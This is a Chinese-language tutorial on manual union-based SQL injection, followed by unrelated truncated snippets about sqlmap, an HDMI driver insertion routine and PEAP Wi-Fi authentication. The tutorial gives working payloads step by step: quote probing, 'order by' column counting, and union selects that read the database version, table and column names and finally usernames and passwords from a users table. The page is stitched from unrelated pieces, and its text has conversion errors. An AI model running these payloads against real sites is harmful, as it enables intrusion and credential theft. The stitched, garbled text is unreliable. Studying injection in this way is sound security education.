輸入單引號 ' 進行檢驗是否存在輸入
id=1 '
原理:頁面發生了報錯,說明輸入的單引號 ' 影響了資料庫查詢,說明此處存在可控的引數,存在注入點
輸入 and 1=2 檢驗是字元型還是數字型
id=1 and 1=2
報錯,證明是數字型。
原理:字元型在查詢有閉合符號,如果直接將and 1=2帶入查詢,以及後後面的測試語句,都會當成字串,不會被執行。
輸入、"、)、} 單個或者組合後在家測試語句 and 1=2 加注釋符號{ # 、 --+ 、%23)
原理:使語句能正常執行
id=1 order by 3
使用二分法,如果輸入錯誤則報錯,如果存在就維持原狀。
原理:select * from table order by n 表示select裡面的第n個字段,從而判斷有幾行
id=-1 union select 1,2,3 %23
發現有2個輸出位(為了union聯合查詢可以正常執行所以要使前方資訊報錯,後邊用%23進行注釋)
原理:union 操作符用於合併兩個或多個 select 語句的結果集
id=-1 union select 1,2,version() %23
發現版本號為5.5.23(版本號5.0以上會專門生成乙個叫information_schema的庫,這個庫里有資料庫中所有表的名字)
id=-1 union select1,2,group_concat
(table_namefrom information_schema.tables where table_schema = database() %23
原理:group_concat(str1, str2,...)將多個字串連線成乙個字串
id=-1 union select 1,2,group_concat(column_name)%20from information_schema.columns where table_name ="users"%23
id=-1 union select 1,2, group_concat(username,password) from users %23
group_concat() 顯示查詢到所有的列
information_schema乙個庫
schemata:儲存所有資料庫的名字
tables:儲存說有表的名字
columns:儲存所有欄位的名字
SQL注入流程
目標蒐集 手工簡單識別 and 1 1 and 1 2 and 1 1 and 1 2 and 1 like 1 and 1 like 2 工具識別 sqlmap m filename filename中儲存檢測目標 sqlmap crawl sqlmap對目標 進行爬取,然後依次進行測試 高階識別...
hdmi插入流程
50ms定時器,一直在迴圈輪訓。當5v檢測插入後,判斷在當前訊號源後 rx.open fg會被設定為1 繼續往下走,檢測不到不往下走 void hdmirx timer handler unsigned long arg rx.open fg 1 的情況下走hdmirx hw monitor rx....
PEAP接入流程
證書主要用來進行終端和網路的相互認證。radius 伺服器首先向 ca證書頒發機構申請伺服器證書,用來代表 radius 伺服器的合法性。客戶端向 caca 根證書,用來驗證 radius 客戶端通過開放系統接入的方法 open system 和ap 之間建立好物理連線。1 client向ap 裝置...